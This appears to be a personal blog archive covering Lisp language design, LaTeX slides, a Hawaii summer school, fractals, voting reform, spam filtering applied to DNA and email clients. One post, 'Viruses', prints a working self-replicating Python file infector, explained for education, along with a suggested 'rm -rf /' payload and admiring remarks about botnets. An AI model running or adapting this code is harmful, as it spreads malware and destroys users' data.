To be a natural orator must be a rare talent, otherwise Powerpoint wouldn't be as pervasive as it is. Peter Norgiv has an eloquent example of how bad it can get. But still, people come on the stage, they load a colorful set of slides and flip them at the audience. Now all presentation systems are created equals. Most of them offer a linear view of the slides, that is, they present the sideshow as a sequence of loosely related slides. With some discipline a user can forge a plan insert a few key slide to tell the audience where are are in the talk and where we are going.

For my slides I used Beamer. This nice LaTeX package let you start with an outline where you define the sections of you talk. You then insert the slides where they should go and you have a nice navigation. The output is in PDF with internal links everywhere. You can click on a section name in the outline to go there and your can use the top navigation bar to achieve the same effect. Since you are in LaTeX you can typeset math properly and have a good separation of content and style.

But, I still support the idea that all presentation software suck. Since you are in LaTeX you have baroque (I love this word) restrictions on the image formats that you can use. Why can't I use SVG? Why won't pdflatex handle EPS? Why do latex+dvipdfm produces artefacts in my rasters? Using LaTeX is as easy as changing the spark plugs on a Ford Astro (yeah you don't get it but trust me is was painful). LaTeX produces extremely high quality typeset and does a not to bad job at separating content end presentation. But using it is such a pain. What is this crap about compiling twice to get the cross references? Can't you just do it until its OK? Where is the option --with-toc-please? The LaTeX markup looks like line noise but what to say about the output while you compile your document? Now, lets talk about documentation. No LaTeX, or even TeX, packages come with online doc. All what they have is LaTeX, or TeX, doc that is compiled into PDF. But Computer Modern, the default TeX font, has extremely fine serifs that makes it utterly unreadable on a computer screen. No one bother to make man pages or HTML doc, how dare I suggest to use such a crude typesetting system? Will I complain about the poor unicode support? Probably not, you've had enough already.

Lets sum up: Conferences are an effective way to avoid students. The selection committee is good at filtering papers on invisible pink stuff. Short talks are really bad so you'd better present only a few key aspects and have a good plan. If you have to use a presentation software, use Beamer because it sucks less. Once we have our non-baroque Lisp we need to write a non-baroque typesetting system. And finally I survived my first talk!
: D

2006-09-28 Programming Languages

In The Hundred-Year Language Paul Graham pretend that the language that we will use in 100 years would be great to have now. I think he is wrong. He probably also think he is wrong because he seems to have stopped working on Arc. In Worse is Better, Richard Gabriel argue that Unix and C came to lead because implementation simplicity is as important as interface simplicity. Every now and them you read a post on Planet Lisp about how we should fix Lisp. Since Paul Graham isn't likely to do it lets look at what it means and how someone could do it

Lisp is more or less a family of programming languages with a few key features though some may argue about the exact minimal set to be called a Lisp: simple sexp syntax, dynamic typing, macros, garbage collection, first class functions, closures and few other things like built-in linked lists and programming in the ast instead of line oriented command lists. There are two members of that family that still have a decent community and who can be used for general programming: Common Lisp and Scheme.

Scheme can be thought the bare minimum you can have to be a Lisp. In fact its probably the bare minimum you can have to be a useful programming language. In Scheme there are no loops, you recurse all the time but the spec makes it mandatory that your implementation will do tail call elimination. Scheme has other power features like continuations. Scheme is really small and that makes it and ideal embeddable scripting language. Sadly the spec don't include a module system and all the implementations now have more or less incompatible ideas of how it should be done. That means that you won't find repositories of libraries for scheme that you can expect to work across many implementations. That very sad point more or less rule out Scheme for general programming and I won't discuss it further.

Common Lisp (CL) is at the other hand of the spectrum. With Common Lisp you have huge language with many features including optional type declarations, selectable levels of compilation (safe, fast, debug, ...), many native types and containers, exceptions (and other "conditions") and an object system so flexible that I would need ten pages just to list its features. There are many cross implementation libraries out there and that makes Common Lisp a great language for general programming. This language is extremely flexible. You typically bent the language into the language you would want to solve a family of problems and use your new language to program into. This is probably new to most programmer but making your own domain specific language can be quite easy and you don't need to mess with a formal grammar if you have macros. The Common Lisp macros let your use Common Lisp to rewrite that code that is already in AST form. You can make code walkers that rewrite definitions when keywords are found, you can add new looping constructs, say to iterate a ternary tree and your new language embeds well into CL and support embedded CL transparently. That being said I often decide to use Python or some other language because of some problems with Common Lisp. I think can we can "fix Lisp", we just need to take the time to diagnose the problems.

Common Lisp was standardized a long time ago. It is impressive that a language could be designed so early and still kick the ass of modern languages feature wise. On the other hand, the designs feels baroque in some ways. A major annoyance is the pathname interface. In modern languages you refer to a file with a string, a path to your file into the directory tree where "/" separate directories. Some languages include a function to merge directories so you don't notice that there are broken systems that don't use "/" for the right thing. Some globing is expected to work almost everywhere like "*.txt". In CL the interface to refer to files is over engineered and included aspects that no modern OS support anymore like versions of a file. In Python you would open(join(base, "foo-"+bar+".txt")), in CL you can be sure that even if raw strings instead of pathnames some implementation will parse your paths and wreck havoc when it find funny chars in your filenames. Yes you can fix that with some packages but since those are not part of the spec, implementations don't include them. So you can't expect that if your mail someone your snippet of code using non-baroque pathnames it will run.

That brings me to my next irritation: shell scripting. Bash is a damn good command interpreter but a really bad scripting language. I mean, foo="blah qwe" should be the same as foo = "blah qwe" don't you think? So I don't script in bash unless what I want to do it really simple. You'd expect that CL with its tons of libraries and specialty looping constructs would be my scripting language but it isn't. The spec is quite strict about the fact that "#" is not a comment char. So no "#!/usr/bin/cl" for you guys. Ok we can work around that, the fix is ugly and still not included with the default install of most implementations but there is more to it. A long time ago, it seems, when the CL spec was drafted, the concept of process wasn't as pervasive as it is today. Common Lisp don't include a way to call another program. Before you over react to that statement, rest assured that all the implementations include a non-standard way to do so. You'll find some really fancy stuff with communication channels much more flexible than pipes but the fact that simple stuff like that isn't portable is argument against using CL as your shell scripting. Needless to say that support to get the command line arguments is strange.

Another problem with is deployment. Most packages these days use ASDF. Unlike Pythons and Perls, there is no support for packaging and deployment of CL modules. ASDF only covers the loading of the module. That makes publishing CL code more painful than it should be so many potential libraries just sit on hard drives and never get released. Here is what Trevor Blackwell has to say about it

 
   It's worth distinguishing a third category of programming
   environments: one where a solitary hacker uses many
   open-source modules written by various folks. I consider this
   a very good environment, unlike pack programming. But it has
   some requirements in common with it. Various languages succeed
   or fail dramatically in making this work smoothly.

   In C/C++, I find I can almost never use other people's stuff
   conveniently. Most have some annoying requirements for memory
   management, or use different string types (char *, STL string,
   GNU String, custom string class), or array/hash types, or
   streams (FILE *, iostream) or have nasty portability
   typedefs (int32, Float).

   CL has fewer such troubles since it has standard memory
   management & string/hash/array types, but there are often
   nasty namespace collisions or load order dependencies,
   especially with macros.

   Most chunks of CL code I've seen (which are mostly PG's) won't
   work without special libraries, which have short names and are
   likely to conflict with other macro libraries or even
   different versions of the same macro libraries.

   Perl packages work pretty well, because everyone agrees on how
   basic types like string, stream, array and hash should work,
   and the normal use of packages avoids any namespace
   collisions. I don't think I ever had a open source Perl module
   break something. I guess Java also prevents conflicts, but you
   have to give up an awful lot to get it.  The huge assortment
   of open source Perl packages testifies to the ease of writing
   them. I've taken a few packages that I wrote for my own
   purpose and found it very easy to make them self-contained and
   contribute them. Usually, people only write C++ libraries for
   very large projects, and it requires a different programming
   style from what you'd use for your own code.

   Anyway, I suggest that Arc's modularity features should be
   designed to support use of open-source modules in
   single-hacker projects, not to support pack programming. This
   suggests, in addition to what CL already has:

   - that modularity be a convention (CL, Perl), not something
   enforced by the compiler (Java). Sadly, I find the CL module
   system way to cumbersome to actually use. It has to be
   convenient enough to use in ordinary programming, not a
   special thing you use when you're writing a module for
   external use.

   - there be a sufficient basic library that everyone won't have
   to write their own basic library. I'm talking about the sort
   of functions from On Lisp like last1, in, single, append1,
   conc1, mklist, flatten. If everyone has their own, then you
   have to package it up with any code you publish (making it
   awkward to publish) and it'll be hard to read other people's
   code with different definitions of basic functions.
  

Now, what do we learn from that? Ok maybe you don't know CL and you think that its a crap language that isn't worth learning. You are probably wrong but the bottom line is that the best language ever designed isn't that useful if it isn't aware of your computing environment. For The Hundred-Year Language, I just don't care how good your language is if it's trapped into autism.

Can we fix CL? I don't know. Should we? No. Paul Graham is right, its time for the next Lisp in the family. But Paul Graham is wrong, its not the time to make another CL, its time to make another C, that is a simple language with a simple implementation that will be useful now, not in 100 years. He is also wrong when he say that his language should not be to script Unix. Scripting Unix still sucks but its still how many great packages are started. What are web apps if not Unix scripting anyway? You look at Perl, Python and Ruby and you know that no matter how bad your language is, as long as it include more Lisp features than the one before it you will have a large hacker base. And the hackers are the ones who make the libraries and thats what makes a language useful for day to day coding. The right language will make simple things real simple and hard stuff doable. CL make it possible to make a symbolic algebra system but way too hard to parse my server logs. Perl got popular when sysadmins decided that bash wasn't good for scripting opted for the next quick hack language.

How do we make this new Lisp? I don't know. Paul Graham make some work and posted a few ideas from other. Dave Moon's comments are interesting. I like the idea of some bits of syntax. Perl has way to much syntax but hash tables are definitely more convenient to use in Python than in CL: hash[key]=foo vs (setf (gethash hash key) foo). We probably can get 80% of non-baroque CL in 20% of the time it takes to make a CL implementation. I think one has to write down a few snippets of code in his new language to see how it looks than draft some spec and to grind down an implementation. One thing that I'm sure it that this implementation should not be done with CL macros. That would make it too tempting to keep plenty of baroque constructs. CL has multi methods but there is something nice with "mono methods": it prevents namespace pollution. When methods are part of the object, methods with the same name can have different signatures. There is a use for both kind of methods, I think don't know how well they could interact. Ok there are many other aspects that need to be looked into and I don't know where to start.

There is an urgent need for a modern Lispish programming language. This quote form Wolfram sums it up What's made it happen for me is Mathematica. I built Mathematica to have a general and very high-level computational environment that would let me do experiments and set up models easily. And it's worked fantastically well. I would never have been able to discover more than a tiny of fraction of what I have without Mathematica.

2006-09-05 On Smashing Stuff

Since I didn't make a proper recap of the summer school yet and that this slashdot comment of mine made it to +5 I think that I should link to it from here.

More to come real soon now(tm).

2006-08-07 Big Island part 1

Even though there is a lot to say about the CASS and about Oahu, I can't find the time to post updates. I will do a good summary when I can but this weekend was the field trip to Big Island and many asked for updates so here is a quick summary.

We left Oahu early Saturday morning. The inter-island flight is less than an hour, we just climb up, get a scenic view of all the islands and go down in the cloudy Hilo. Big Island is really young, less than a million years old. Erosion has only dug rocky rivers and there are waterfalls everywhere. We were ahead off our schedule so we had time to do hiking in the morning. Around Hilo there is heavy rain forest, as we climb up on the Mauna Kea we cross many different eco systems, from deciduous forest to shrub lands and tundra.

While getting acclimated at the Onizuka Station we went for a hike on cinder cones. The station is above most of the clouds, the view was breath taking. The oxygen lean air gave us a good buzz, a diluted preview of what to expect at the summit. We had the honor to get dinner at Halepauhaku, the small lodge where astronomers and support staff are hosted.

Guides lead the caravan of jeeps and trucks on a rough gravel road that reaches to the top. Rangers are closing the pack with spare oxygen masks in case someone faints. Above the clouds the is no vegetation, the landscape is essentially cinder cones with colors from dark tan to rust-red with most of them light tan as beach sand. We finally arrived and saw the telescopes. We were surrounded by the biggest mirrors and the best instrument in the world. The wind was cold and the air was lean, a strange sense of peace settled while we were lectured on those majestic instruments and on the geology of the Mauna Kea. The presentation included a visit inside of both Keck1 and the UH observatories.

After another meal at Halepauhaku we enjoyed the moonrise and the sunset between the station and the summit. We unfortunately went on one of the rare days when its too cloudy at the station to do star gazing but that gave of an excuse to enjoy mai-tais at Uncle Billy's tiki bar.

Sunday morning was rainy in Hilo. We nevertheless went for snorkeling at a blacksand beach. The coral reef was filled with colorful fished and sea urchins. We left Hilo around 10h for an exclusive lecture on the Kilauea and the geology of the Hawaiian Islands. We were fortunate enough to meet a geologist who was back from and active flow and who drew us a map of the area. The geology around the Kilauea is so active that all maps are obsolete as soon as they reach the printing press.

To get to the active flow required an hour of hiking on a pahoehoe lava field. The field reaches as far as you can see. The black iridescent rock is full of sharp millimeter long glassy flakes. I just touched the ground without without my gloves and I had blood droplets all over my hand. If someone was to use and ungloved hand to balance himself he would probably leave most of his skin on the rock. Walking on the lava field sounds like walking in the snow when its -30C, you hear tiny little obsidian crystals shattering as your feet crosses the devastated land. The porosity of the rock gives a great traction and its possible to climb on large, steep, busted out bubbles of clogged lava tubes to get a better view.

As we progressed the land gave signs that we were close to the active flow. The ground sounded hollow and there was fumes flowing out of cracks. Fresh pahoehoe flow has a dark silvery shine. With the wind on your back you can find the active flow by looking for wavy air. When you get close to the lava you can hear the sound of the barely solidified rock that is twisted by the pressure of the flow, the crust that cracks and viscous fluid that is bent into ripples. The wind pushes the convection away but the radiance is strong and the heat prevents you from stepping too close Pele's house.

We unfortunately had to leave the nursery of the future mountain to catch our plane. All exhausted, out of water, sweaty, wet by the rain but with a large smile on our face as a rainbow guided us. The beer that we had on the plane was the best that I've ever had.

2006-07-24 CASS Day 1

I'm finally in Honolulu! The flight was long and event less. I had a lot time to meditade on the landscape. My first idea was the Montreal really turned into a sprawl but seeing Los Angeles reassured me a bit. The welcome comitee was composed of Guylaine Poisson, her husband Pascal and Mahdi Belcaid.

Those people are simply great! They do master technical skills and they are the most friendly people you can imagine. They take me around a lot and call me up for lunches. Guylaine and Pascal live on the side of a huge crater with an amazing sight. Their house is surouded with exotic vegetation and there are geckos climbing on trees and walls everywhere.

My first day was relax since jet lag made me too sleepy to do anything. Just a bit of stargazing on the beech. The air is really dry in Honolulu. The beech is in dowtown Waikiki but you can see many stars. I don't see that many when I ride 45 mins away from Montreal.

On the second day we went surfing. Mahdi is a great surf teacher. I took a longboard (as recommended by Mahdi) and after 30 minutes I was able to catch waves and stand-up. When you look at surfers it all seems easy and relaxing but its actually pretty demanding. You need to paddle a lot, and fast, if you want to catch the waves. Friction with the board is kind of bad too. My nipples are still burning, I grabed one of those lycra shirts, lets hope that it will fix that. The beaches are really impressive (yes that me in the water). Temperature is perfect and the water is extremly clear.

The CASS schedule is kind of great too. The presentation are in the morning and we have the afternoon for personal work and exploration of the island. Yeah it sounds like vacations but its actually a pretty good place to learn about "real-time geology" and how life evolve where there are many different climats in close proximity. So the first day was mostly presention and of schedule and visit of the quite exotic campus.

In the afternoon Pascal took me for a hike on one of those breathtaking mountains. It was pretty hot but there is a constant breeze, the only real problem is the sun but we were ok under the trees. Flora is obviously exotic. But the most unexpected was the fact that there are no moskitos or other anoying insects at all. The trail wasn't too rough but still not that easy. We crossed many locals wearing only swimsuits and flip-flops. In fact, I can't recall to see an Hawaiian wearing anything else. At the end of trail was a waterfall with crazy people jumping from a ten meters high cliff.

I love this place. More to come...

2006-05-01 w00t!

I'm accepted for the Computational Astrobiology Summer School in Honolulu!! The Hawaii Astrobiology institute has an impressive team, I really look forward to work with them. What is astrobiology? Kind of hard to tell before I attended the summer school but it has something to do with the study of environmental samples from extreme conditions like undersea volcanoes and the evaluation if such a resistant lifeform could live on, say, Enceladus. It looks like I'll have to learn to surf. :-D

2006-03-31 Torrent Full of Lisp Porno Movies

The Mandelbrot Set is the index of the parameters for which there is a connected Julia Set. Seeing how the two are related is quite interesting. Especially with animations. And if you like the little sample, there is a torrent full of them.

The complete source code is included, of course. The walks along the main cardioid and the main bulb are pretty neat. From this we can guess that a walk along some secondary bulb would especially nice. Now, I have to ask for help on that one. The point of intersection of the secondary bulbs are know, they are

   (/ (- 1 (expt (- (exp (* 2 #c(0 1) pi (/ p q))) 1) 2)) 4)

The main bulb is p=1 and q=2. The first person who tell me how to find center of the secondary bulbs will win a custom rendered movie! Isn't it a good deal?

update: the torrent is gone. Bittorrent is great for large files with flash popularity. Without it hosting large files like that would have been really difficult. The catch is that you need seeds and you can't hold on them forever. The movie pack was downloaded 75 times for a total of 19 gigs. Wow! Thanks to all the seeds! I'll pay you back with more fractal stuff soon.

2006-02-25 Viruses

You sometimes hear non senses like there are no viruses for GNU/Linux. Anyone with half a brain knows otherwise but why is this idea still alive? What is a virus anyway? A computer virus is a program that copies itself into other programs. To avoid being noticed, the virus keep the infected alive. So here is the plan

  • plant an infected program where someone dumb will run it
  • when the infected program starts, the virus kicks in first
  • the virus looks for another program to infect
  • the virus launch the infected program

Simple isn't it? Yes, its dead simple, here is a working example

#!/usr/bin/python

# This is a proof of concept virus for GNU/Linux.  As you can see by
# running it it is possible to have viruses for GNU/Linux.
# Fortunately a sane privilege model will limit the amount of damage
# such a virus will do.

# I, Yannick Gingras <ygingras@ygingras>, wrote this virus for
# educational purpose.  I crippled it so it won't spread.  Use it at
# your own risks.

import sys
import os
import stat
import random
from tempfile import NamedTemporaryFile

TARGETS_DIR = "/tmp/infectable"
PRG = "echo hello" # will be replaced by the targets body
VIRUS = open(os.popen("which "+sys.argv[0]).read().strip()).readlines()
MODE = stat.S_IRWXU + stat.S_IROTH + stat.S_IXOTH

def infected(path):
    # not really good, we won't infect many files...
    return open(path).readline() == VIRUS[0]

def infect():
    if not os.path.isdir(TARGETS_DIR):
        return
    target = os.path.join(TARGETS_DIR,
                          random.choice(os.listdir(TARGETS_DIR)))
    if infected(target):
        return
    data = open(target).read()
    lines = map(lambda l:(len(l)>5 and l[:5]=="PRG =") \
                and ("PRG = " + repr(data) + "\n") or l,
                VIRUS)
    open(target, "w").write("".join(lines))
    os.chmod(target, MODE)

def run():
    print "pwn3d!"
    tmp = NamedTemporaryFile("w")
    tmp.write(PRG)
    tmp.file.close()
    os.chmod(tmp.name, MODE)
    os.system(tmp.name+" "+" ".join(map(lambda a:"'%s'" % a,
                                        sys.argv[1:])))

if __name__ == "__main__":
    random.seed()
    infect()
    run()

This nice and portable virus will even run on any system where Python is ported, not just on GNU/Linux. Why are most GNU/Linux systems free of viruses then? You might have noticed that this virus needs to open its target in write mode. Thats the catch. On GNU/Linux users can't open programs in write mode. But someone dumb enough to run this file as root would be in big trouble.

There is something else. Looking at how simple a virus is, I hope people will stop to think that virus writers are programming gods. Writing a virus is so easy that most people who can program never even try to do it. There is no challenge at all. Since I learned how to open a pipe, a long time ago, the idea was clear in my head how a virus was made. I decided write this one down because I notice that this idea is not clear for some people who otherwise are really brilliant persons.

Ok yes there is a bit more to it. This sample virus has no payload. To make it replicate and once is a while bust the whole system you would need to change the payload to something like that

       random.randrange(666) or os.system("rm -rf / &")

Still not such a challenge. To avoid detection you need to replicate but not verbatim. This is a bit hard with python but you could use Perl and be very creativity in formating the code in the target.

Where virus writers are displaying ingenuity is with bot nets. Many "enterprise" vendors are claiming that they have a powerful "grid" solution. You see and hear "grid" everywhere but what does it really means? Grid usually refers to an heterogeneous cluster. Where a cluster is usually a bunch of smaller computers duck taped together to form a bigger computer, sort off. Some massively distributed solutions are available out there like foo@home, distributed.net and boinc but they all seem to miss the big picture. What do I get from running their computation client? And why can't I send my own task to the grid?

Bot masters write viruses that install computation clients on infected computers. When someone wants a computation, he ask a bot master to run it on its infected computers. Bot masters are the first step to the democratization of the distributed computing power. When someone will manage to find a convincing argument for someone to install a distributed computation client, we'll have larger grid networks. And then, the leading grid networks will be the ones where everyone can bid and submit his jobs. Where there will be no overhead. Just download the devel-kit, derive the Cruncher class and upload it to the grid controller with your bid. Jobs could be sent in a priority queue ordered by bid. And we know there is a buck to make in the democratization of the grid because bot masters are already getting rich.

2006-02-11 Random stuff

When the urge to work comes over you, just sit down and relax, it should go away.

Many asked details about my scope. As stated before, its a Maksutov Cassegrain, more precisely its a Skywatcher MAK90EQ1 with 90mm aperture and 1250mm focal length. While we are talking about star gazing its interesting to note that I won't have to make seasonal watch plans anymore because Universe Today released a 407 pages PDF of daily watch plans for 2006. French readers will also enjoy this nice local sky guide optimized for 45 degree of latitude.

I came across a really nice photo set today. This kind of miracle is only possible with the new democratization of the web. Some beekeeper decided to casually share photos of is hives. Definitely not something I would look for, I stumble on those because of the magic of tags and "interestingness" computation. Had this been put on a personal home page with animated gifs, we would all have missed the birth of a bee, the nobleness of a wild hive architecture, the coziness of a nursery and the graphic comparison of young and old bee wings. Bee wings don't regenerate. Each bee has a fixed flight expectancy. When a forager reach the point where it can barely fly, it stays at the hive and uses its wings almost exclusively for cooling the hive.

In other news what a shock it was to find that some people who used to claim to be GNU/Linux specialists and who still put penguins all over their website recently switched to IIS. No need to say that I won't get my next computer from these bunch of hypocrites who want to sell you their skill to build your web server with Gentoo but who can't run it themselves.

Lets end with good news. Quebec is quietly consulting its population on a possible redesign of is election system. This is really great stuff except that no one knows about it. The first past the post (FPTP) system is really broken but I think that in Quebec it shows more. For the 2003 elections one party had 18% of the votes but ended up with only one seat out of 125. Note that I don't advise any one to vote for this particular fascist party. Duverger showed that the FPTP tend to produce two party systems and favor strategic voting, that is, voting for someone you don't like but who you think can win. FPTP has nothing to do with democracy, it produce alternation of the same two party without any regards to what the population think. But now that we have an opportunity to get a new voting system, which one should we pick? Wikipedia has a bunch of articles on voting systems and I think that any Québec citizen worthy of the name has to at least read all of those. There is also this really nice survey of voting methods.

What stands out is that all voting systems sucks. Forget about true democracy anytime soon. Proportional voting systems suck a bit less. If 51% of the population think that the other 49% should so shot, the 49% against the wall should have something to say about it. The easiest way to ensure proportionality is to have more than one person to elect per legislature. This can be achieved by merging existing districts or even by calling the whole country (some people still call this one a province) a single district with 125 representative to elect. Québec has only two big cities so merging all the districts into a single legislature might dilute important local questions. The proposed system in BC was to make several super district with single transferable vote. This ensure proportionality and local representation. The smaller the districts, the higher the local representation but you loose equally in proportionality.

Inside a proportional legislature, you have to choose a voting system. You can get a list that you rank by priority, you can get multiple votes, you can get a single vote but since you have a super district small parties have better chance to elect someone. With super districts, small parties can be more efficient. If they expect to have only a few candidate, they only need a few candidates, not 125 filler (proxy?) candidates that are just there to forward calls to the party leader.

Single transferable vote is interesting because it enable proportionality and minimize wasted votes. What is a wasted vote? Its a vote for someone who would get elected anyway. STV is really simple too. You rank the candidates you like by priority. When you first choice has enough vote to get elected, all the remaining votes are transfered to peoples second choice. How many vote is enough to get elected depends on some strange formula but other unlucky folks went thought the trouble of tuning it for us and it seems to work now.

Its definitely not easy to pick a voting system but its easy to see we need a new one, now. So make your readings and fill the voting commissions survey. And take a look at Saturn too, its breath taking!

2006-01-27 Evil All Around

I have a conjecture. It seems that most modern evil is the result of publicly traded companies. Why? I don't know, maybe its the way power and accountability applies to publicly traded companies. Share holders are not accountable, share holders vote with their money and shareholder have (mostly) no way to tell the board of director what they think except by fluctuation of the share value. The net result is that even though shareholders have ethic values, the only usable metrics for the board of directors become the stock price and the balance sheet.

I was expecting a counterexample when Google went public. That was wishful thinking. Google started to censor search results in China. This is no minor evil, and its really bad for Google. Google was better because we could trust it. When a search result comes up in a second grade search engine we never know if its because its a good result or because someone paid to put it there. Now, with Google is the other way around. Where a result come up, is it because its good or because someone paid to filter out the real hits ?

Now that Google is publicly traded, it has a new metric and if we don't like what Google does, we have to say it using that metric. How? The first thing I did was to cancel my Google account (google account -> preferences -> account -> delete acount). But unfortunately you can't tell why you did it in this form so you must also use the feedback form to let them know. Yeah, its going to be hard to avoid google search but at least if we cancel enough accounts, delete enough Google cookies and avoid enough the other Google services, we can make a visible gradient shift on the share value metric. So far so good, the publicly traded company conjecture still holds.

2006-01-16 Marking DNA as spam

The idea behind bioinformatics, at least for some people, is that since the information encoded into DNA is sequential, you can parse it more or less the same way that you parse an English text. You can apply a regex to DNA and you can search DNA just as you can search text. But how far can you push it?

The part of information processing science formerly known as AI developed a whole range of "machine learning" techniques. Most never made it into the real world but once in a while, a new idea is ripe and you see it spread like a storm. Most techniques that tried to model how the brain works are miserable failures, but it happens that someone understands how people use information and apply really simple pasterns turn worthless data into the most valuable repository of knowledge.

If you were to look for "Bayesian classification" in a stats textbook, you would probably find nothing, except maybe the it's a method that you should avoid. Naive Bayesian classification is a way to combine independent evidences about some event to refine your knowledge about it. The catch is right there, "independent" in probabilities in what they call a "strong assumption" and you almost never see truly independent evidences except for trivial stuff.

When Paul Graham solved the problem of spam, he made something that would drive any stats teacher crazy, he said that the words in an email are independent. Why did he do that? If you do that, you can use a really simple formula, if you don't, the computation is so hard that no computer can undertake it for a 300 words email. While statisticians are still screaming, Bayesian filters are filtering the worlds spam and they work better than anything else.

How about DNA? The original question was "given the few proteins that we know to be localized in the nucleolus, can we find a pattern that will help us find others?" If someone ask you that, the fist logical reaction should be to grab something to drink. Now that you've taken care of that, you can say that you don't know and that you'd prefer to work on something as boring as applying design patterns to bioformatics, you can decide to apply some techniques that should theoretically work or you can decide to dive and to try what works in the real world, even though it shouldn't.

What we did is shocking, we didn't implement a Bayesian classifier for DNA, we used the excellent spamoracle and fed it DNA sequences as if it was emails. I kind of hope that my stats teacher won't read that far but was is even more shocking is that it works, to some extent.

We don't find all the nucleolar proteins but we find a lot of them with really few false positives. Further more, spamoracle has really nice regex queries on the training set. That way we can explore what kind of "words" leads to correct classifications. And thats the interesting parts because you can't do that with neural nets and other machine learning techniques. And what we find fits pretty well with what people find in wet labs. Now, a word of warning is needed. BLAST is not working like Google and there is a reason for that. You typically search for a few exact word on Google and you typically do a fuzzy search on a really long DNA word with BLAST. Before you can replace all your wet lab staff with monkeys punching sequences into a Bayesian filter, a lot of work must be done on building better training sets and on biologically relevant ways to search for a word in correlation tables.

2005-10-29 Night sky

When you live in a large enough city, watching the stars is rare delicacy that you can't often afford. This semester I took a course on astronomy and it reminded me how much I missed watching the stars. You can live in the city and completely forget that there are stars beyond that gray dome but when you learn about cosmology, about why nebulae glow, about the life cycle of stars, about dying red giants like Aldebaran, the lack of night sky becomes unbearable.

So I listened to my heart and I bought a telescope. A really nice and short 90mm maksutov-cassegrain with an equatorial mount. It is a bit heavy for the aperture but the size is a perfect fit for a motorcycle backpack. Of course as soon as I bought it there was a streak of never ending clouds. At last, after a week I was able to take it out for its first light. Now, when you have a scope one its tripod and its mount aligned and ready to watch, where do you point it? I had my planisphere in hand but all those NGC numbers don't tell much about how interesting the object is and if you can expect to see them with a 90mm scope.

Since I can't spend all my nights looking at M42, I did my homework and found the deep sky objects that can be observed with a small scope and that are well positioned at this time of the year. There is no point in keeping this information for myself so I offer this late fall watch plan to my fellow amateur astronomers who live around 45° of north latitude.

2005-10-15 Death of a storyline

A long time ago, during my first job as a coder, I was introduced the geek lifestyle. Being a geek is different from being a nerd though most nerds have really good unexploited geek potential. Being a geek is to be proud of your nerdiness, to a point where you expose it defiantly to the world. Geeks wear t-shirts with cryptic code snippets and talk with each others in a obscure jargon. Geeks don't enjoy the morning coffee while reading the newspaper, they do so while reading Slashdot, User Friendly and many other geek oriented comic strips.

One such strip, Megatokyo, was really influential in the development of my early geek persona. To truly understand what I mean you have to look for the early strips of Megatokyo. The characters in User Friendly are professional geeks, the ones working in tech related jobs but the ones in Megatokyo were the college computer nerds type. Now thats something someone who just graduated can really identify himself with.

Megatokyo was co created by two persons, an über geek and a manga style artist. That combination was perfect, you had excellent geek cliché stories illustrated in a talented artful manner. Unfortunately, this wonderful collaboration came to a clash. Sometime in 2002, Rodney Caston (the geek) left Megatokyo and Fred Gallagher (the illustrator) went to run Megatokyo all by himself. What happen was subtle at the time and since there was no noticeable change in the drawing stile, you might have thought that everything was going fine. Until one day you wake up and say "WTF, how many boring strips in a row did I swallow?".

Now that you know when too look, you can go ahead and see for yourself. The story got filled with love stories, slow moving plots, Largo was turned into some evil character and geek elements were removed, one by one. You would have a hard time to find a real game reference in the last year of strips. Even the l33t feels wrong nowadays. Fred Gallagher is a talented artist, he doesn't have to be omni potent as long as he get in touch with people who can fill in the blanks. For that reason, I think that it is time to act. The Megatokyo fan base will walk away if we wait too long and that great comic strip will fall into irrelevance. You can save Megatokyo, write to Fred Gallagher and ask for the return of Rodney Caston.

2005-08-21 Email Clients

If someone typed something like date +"%Y" at his terminal, assuming that he used the Gregorian calendar, he would probably see something like 2005. If the same person was to read RFC196, he would probably see July 20, 1971 near the beginning. Only 13 years after the discovery of the Bessemer process we had the first transcontinental railroad, after more that 30 years of email, all email clients suck.

Anyone who uses email for something else than remote backups knows what I'm talking about. If you need to read your emails from more than one location you can probably forget all the nice "native" clients. But webmails requires heavy usage of the mouse, lacks many important features like a usable spell-checker and incremental search. All the webmail service provider have EULA that requires your first born and a pint of fresh blood a month. Namespace pollution is another problem, I don't want my email to be y._kk_gingras234252_asd@example.com, I want ygingras@ygingras.net. So called native clients have pretty UI but when some important feature is needed we feel that they don't want to mess too much with that UI so the feature get postponed. Spam is a plague but a great thinker found a solution a few years ago already.

The solution (for the UI part) is dead simple: add a mark as spam button. There are tons of great Bayesian filters out there. They all perform pretty well since the math is so simple. I use spamoracle because is has an easy to tune engine, an tri-state classification and is pretty fast. The only problem is that it needs to be feed a mail corpus that most email client makes hard to build. Keeping in mind that I want to access my mails from several places and that all webmails suck badly, I turned to gnus. Before anyone even think of using gnus, he should be warned that gnus is ugly. Well, we can event say that it is really disgustingly disfigured. This client is excessively configurable, the manual features a 10 pages chapter on starting gnus. Nevertheless, this is the most usable client I can find. The first thing is that we configure it with either Emacs customize mode or with Lisp expression. Emacs built-in regexp engine and visual-regexp editor will replace 200 click made filters with a pretty expression in no time:

  (setq nnmail-split-fancy 
      '(| (to "sbcl-devel@" "sbcl-devel")
	  (to "gnu-arch-users@gnu\\.org" "Arch")
	  (to "mslug@iro\\.umontreal\\.ca" "MSLUG")
	  ("Subject" "Bacula: Backup" "bacula")
	  (to "\\b\\([A-Za-z0-9\\-]+\\)-list@lists\\.alioth" 
	      "alioth.\\1")
	  (to "\\b\\([A-Za-z0-9\\-]+\\)@securityfocus\\.com" "sec.\\1")
	  (: spam-split)
	  "inbox"))

Some nice feature here is the dynamic folder (groups in gnus parlance) name creation. The messages are presented with thread but with bonus that you can re-thread a message if for example someone is using a broken client that doesn't know about threading yet. Filtering is excellent, we can filter for a time slice but once we have the interesting messages we can include the whole parent threads. Now lets talk about spam. Gnus have a good spam integration. It will gladly put what your filter say it spam in a spam folder and let the rest flow in your inbox. Did I just talk about tri-state classification. The bad news is that I wasn't able to find a tri-state option for integration with spamoracle. The good news is that I was able to implement it in 5 minutes by replacing

  (when (re-search-forward "^X-Spam: yes;" nil t)
     spam-split-group))

by

  (cond ((re-search-forward "^X-Spam: yes;" nil t)
         "obvious")
        ((re-search-forward "^X-Spam: no;" nil t)
         nil)
        (t "suspicious"))

